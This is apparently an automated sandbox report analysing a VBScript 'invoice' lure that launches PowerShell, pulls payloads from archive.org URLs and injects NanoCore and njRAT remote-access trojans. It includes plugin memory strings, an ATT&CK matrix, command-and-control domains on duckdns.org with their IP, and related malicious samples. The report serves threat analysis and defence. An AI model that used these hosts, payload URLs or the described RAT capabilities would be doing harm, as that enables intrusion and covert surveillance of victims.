      Source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: aspnet_compiler.exe, 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
      Yara detected NjratShow sources
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder1Process Injection212Disable or Modify Tools1Input Capture11File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting221Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery12Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting221Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsPowerShell1Network Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 458883 Sample: 3G1J49A6V_Invoice.vbs Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 7 wscript.exe 1 2->7         started        process3 signatures4 48 VBScript performs obfuscated calls to suspicious functions 7->48 50 Wscript starts Powershell (via cmd or directly) 7->50 52 Obfuscated command line found 7->52 10 powershell.exe 14 30 7->10         started        process5 dnsIp6 30 ia601405.us.archive.org 207.241.227.125, 443, 49746 INTERNET-ARCHIVEUS United States 10->30 32 ia801408.us.archive.org 207.241.228.148, 443, 49756 INTERNET-ARCHIVEUS United States 10->32 28 PowerShell_transcr....20210803203913.txt, UTF-8 10->28 dropped 54 Creates an undocumented autostart registry key 10->54 56 Writes to foreign memory regions 10->56 58 Injects a PE file into a foreign processes 10->58 15 aspnet_compiler.exe 10->15         started        20 aspnet_compiler.exe 10->20         started        22 conhost.exe 10->22         started        24 2 other processes 10->24 file7 signatures8 process9 dnsIp10 34 newjan.duckdns.org 185.244.30.23, 49776, 49777, 49778 DAVID_CRAIGGG Netherlands 15->34 26 C:\Users\user\AppData\Roaming\...\run.dat, data 15->26 dropped 38 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->38 36 dangomra.duckdns.org 20->36 file11 signatures12

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.Gen7Download File
      20.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      20.2.aspnet_compiler.exe.3828a18.7.unpack100%AviraTR/NanoCore.fadteDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://gro.sndkcud.armognad0%Avira URL Cloudsafe
      http://certificates.godaddy.repo0%Avira URL Cloudsafe
      newjan.duckdns.org0%Avira URL Cloudsafe
      http://certificates.godaddy.0%Avira URL Cloudsafe
      https://go.micro0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      dangomra.duckdns.org
      		185.244.30.23
      		truetrue
        		unknown
        ia601405.us.archive.org
        		207.241.227.125
        		truefalse
          		high
          newjan.duckdns.org
          		185.244.30.23
          		truetrue
            		unknown
            ia801408.us.archive.org
            		207.241.228.148
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://gro.sndkcud.armognadtrue
              • Avira URL Cloud: safe
              		unknown
              newjan.duckdns.orgtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpfalse
                		high
                https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txtPowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt.3.drfalse
                  		high
                  http://certificates.godaddy.repopowershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://certs.godaddy.com/repository/0powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpfalse
                    		high
                    http://certificates.godaddy.powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ia801408.us.archive.org/20/items/server_202108/Server.txtRun.vbs.3.drfalse
                      		high
                      http://google.comaspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000003.00000003.669481789.000001EA294EC000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://certs.godaddy.com/repository/1301powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            207.241.227.125
                            		ia601405.us.archive.orgUnited States
                            		7941INTERNET-ARCHIVEUSfalse
                            207.241.228.148
                            		ia801408.us.archive.orgUnited States
                            		7941INTERNET-ARCHIVEUSfalse
                            185.244.30.23
                            		dangomra.duckdns.orgNetherlands
                            		209623DAVID_CRAIGGGtrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:458883
                            Start date:03.08.2021
                            Start time:20:38:20
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 38s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:3G1J49A6V_Invoice.vbs
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winVBS@12/11@16/3
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .vbs
                            • Override analysis time to 240s for JS/VBS files not yet terminated
                            Warnings:
                            Show All
                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                            • TCP Packets have been reduced to 100
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.211.6.115, 13.88.21.125, 20.82.210.154, 20.54.110.249, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            20:39:14API Interceptor39x Sleep call for process: powershell.exe modified
                            20:41:46API Interceptor777x Sleep call for process: aspnet_compiler.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            207.241.227.125Property.vbsGet hashmaliciousBrowse
                              Booking_confirmation.vbsGet hashmaliciousBrowse
                                Report-11003456773312.vbsGet hashmaliciousBrowse
                                  Report.vbsGet hashmaliciousBrowse
                                    Report.110034567733.vbsGet hashmaliciousBrowse
                                      AppraisalReport.vbsGet hashmaliciousBrowse
                                        Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                          207.241.228.148PAYMENT COPY.pptGet hashmaliciousBrowse
                                            8b664227_by_Libranalysis.pptGet hashmaliciousBrowse
                                              KUP ZAM#U00d3WIENIE-34002174.pptGet hashmaliciousBrowse
                                                280fdaa5_by_Libranalysis.pptGet hashmaliciousBrowse
                                                  SiggiaW.vbsGet hashmaliciousBrowse
                                                    DHL SHIPMENT NOTIFICATION,6207428452.pptGet hashmaliciousBrowse
                                                      Analysis Reports.pptGet hashmaliciousBrowse
                                                        original_file.pptGet hashmaliciousBrowse
                                                          Remittance_PO-89488484.pptGet hashmaliciousBrowse
                                                            Confirm Order for AKTEK Company_E4117.pptGet hashmaliciousBrowse
                                                              PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                                final po PP-11164.pptGet hashmaliciousBrowse
                                                                  NR52.vbsGet hashmaliciousBrowse
                                                                    7.ppsGet hashmaliciousBrowse
                                                                      CONTRACT AGRREMENT FORM.pptGet hashmaliciousBrowse
                                                                        Order 122001-220.pptGet hashmaliciousBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          ia601405.us.archive.orgProperty.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Booking_confirmation.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Report-11003456773312.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Report.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Report.110034567733.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          AppraisalReport.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          ia801408.us.archive.orgPAYMENT COPY.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          8b664227_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          KUP ZAM#U00d3WIENIE-34002174.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          280fdaa5_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          SiggiaW.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          DHL SHIPMENT NOTIFICATION,6207428452.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          Analysis Reports.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          original_file.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          Remittance_PO-89488484.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          Confirm Order for AKTEK Company_E4117.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          final po PP-11164.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          NR52.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          7.ppsGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          CONTRACT AGRREMENT FORM.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          Order 122001-220.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          SKM_36721012514070-2.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.148
                                                                          newjan.duckdns.orgLxYbtlP5nB.exeGet hashmaliciousBrowse
                                                                          • 185.244.30.23
                                                                          Invoice#282730.exeGet hashmaliciousBrowse
                                                                          • 79.134.225.9
                                                                          Urban Receipt.exeGet hashmaliciousBrowse
                                                                          • 79.134.225.9
                                                                          d9hGzIR8mh.exeGet hashmaliciousBrowse
                                                                          • 194.5.97.75
                                                                          6554353_Payment_Invoice.exeGet hashmaliciousBrowse
                                                                          • 194.5.97.75

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          INTERNET-ARCHIVEUSInvoice_#.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.120
                                                                          INVOICE.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.140
                                                                          #WUHD09.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.116
                                                                          Property.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Invoice.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.120
                                                                          Booking_confirmation.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.144
                                                                          NCL_Mandatory_Form.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.110
                                                                          HR-Ageing-Report.pptGet hashmaliciousBrowse
                                                                          • 207.241.227.129
                                                                          Reciept_ups.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.123
                                                                          Invoice #20291.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.113
                                                                          45678.vbsGet hashmaliciousBrowse
                                                                          • 207.241.230.172
                                                                          New order (DDV21-0014) TOKYO HIP.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.154
                                                                          SO-19844 EIDCO.ppamGet hashmaliciousBrowse
                                                                          • 207.241.228.150
                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73
                                                                          New Purchase Order-030220.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.145
                                                                          DHL_119040 Beleg.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.145
                                                                          2UUlKfJYJN.exeGet hashmaliciousBrowse
                                                                          • 207.241.224.2
                                                                          Drawing for Our New Order.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.158
